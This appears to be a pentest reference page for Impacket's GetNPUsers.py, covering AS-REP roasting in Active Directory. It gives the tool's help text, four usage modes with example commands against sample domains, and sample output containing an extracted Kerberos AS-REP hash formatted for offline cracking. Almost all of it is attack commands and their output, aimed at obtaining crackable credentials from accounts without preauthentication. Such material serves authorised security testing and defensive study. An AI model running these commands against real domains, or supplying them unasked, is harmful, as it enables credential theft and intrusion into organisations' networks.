Queries target domain for users with ‘Do not require Kerberos preauthentication’ set and export their TGTs for cracking (ASREPRoasting).
Install Impacket.
GetNPUsers.py [-h] [-request] [-outputfile OUTPUTFILE] [-format {hashcat,john}] [-usersfile USERSFILE] [-ts] [-debug] [-hashes LMHASH:NTHASH] [-no-pass] [-k] [-aesKey hex key] [-dc-ip ip address] [-dc-host hostname] target
Impacket v0.12.0.dev1+20240718.115833.4e0e3174 - Copyright 2023 Fortra
positional arguments:
target [[domain/]username[:password]]
-h, --help show this help message and exit
-request Requests TGT for users and output them in JtR/hashcat format (default False)
-outputfile OUTPUTFILE
Output filename to write ciphers in JtR/hashcat format
-format {hashcat,john}
format to save the AS_REQ of users without pre-authentication. Default is hashcat
-usersfile USERSFILE File with user per line to test
-ts Adds timestamp to every logging output
-debug Turn DEBUG output ON
NTLM hashes, format is LMHASH:NTHASH
-no-pass don't ask for password (useful for -k)
-k Use Kerberos authentication. Grabs credentials from ccache file (KRB5CCNAME) based on target parameters. If valid credentials cannot be found, it will use the ones specified in the command line
-aesKey hex key AES key to use for Kerberos Authentication (128 or 256 bits)
-dc-ip ip address IP Address of the domain controller. If ommited it use the domain part (FQDN) specified in the target parameter
-dc-host hostname Hostname of the domain controller to use. If ommited, the domain part (FQDN) specified in the account parameter will be used
There are a few modes for using this script
1. Get a TGT for a user:
GetNPUsers.py contoso.com/john.doe -no-pass
For this operation you don't need john.doe's password. It is important tho, to specify -no-pass in the script,
otherwise a badpwdcount entry will be added to the user
2. Get a list of users with UF_DONT_REQUIRE_PREAUTH set
GetNPUsers.py contoso.com/emily:password or GetNPUsers.py contoso.com/emily
This will list all the users in the contoso.com domain that have UF_DONT_REQUIRE_PREAUTH set.
However it will require you to have emily's password. (If you don't specify it, it will be asked by the script)
3. Request TGTs for all users
GetNPUsers.py contoso.com/emily:password -request or GetNPUsers.py contoso.com/emily
4. Request TGTs for users in a file
GetNPUsers.py -no-pass -usersfile users.txt contoso.com/
For this operation you don't need credentials.
GetNPUsers.py offsec.nl/ -usersfile users -dc-ip
Impacket v0.9.24.dev1+20210726.180101.1636eaab - Copyright 2021 SecureAuth Corporation
[-] User johndo doesn't have UF_DONT_REQUIRE_PREAUTH set
[email protected]:0507c99ed0c44924dee1bd4fdb34e0b9$e6abe0cd017c45688ff4d667183ce9c8cb171635250c7a5d1f12666549466ecb367e6445751b867a44f483e8b255ebd039ea7375229a1c6763eb61965d34945b8500058e36dd32fadd6bdc5dc5fff5ef6ebc90343bdf177984852b3536fb12ab4a21f8cdee93339e7fc97d3028eb1f7643e1c9156f7d1facd658dd5b2061572f615abc4ea4007294ee648f38af428ef5f7045bb194c44bfef4f39f14ad02e982f74ef49a5a904e874ce1c2b5a38b61a4b30b58b2b521f4f81cdaee348b497a9ca757fe33e30e9ef6c7911963e120e905f5cf063964b5a13f7d9668a1f3e63466d1c0d18d9e76e31a8bec236fff42fa928dac
[-] User johndo-adm doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User janedo doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Administrator doesn't have UF_DONT_REQUIRE_PREAUTH set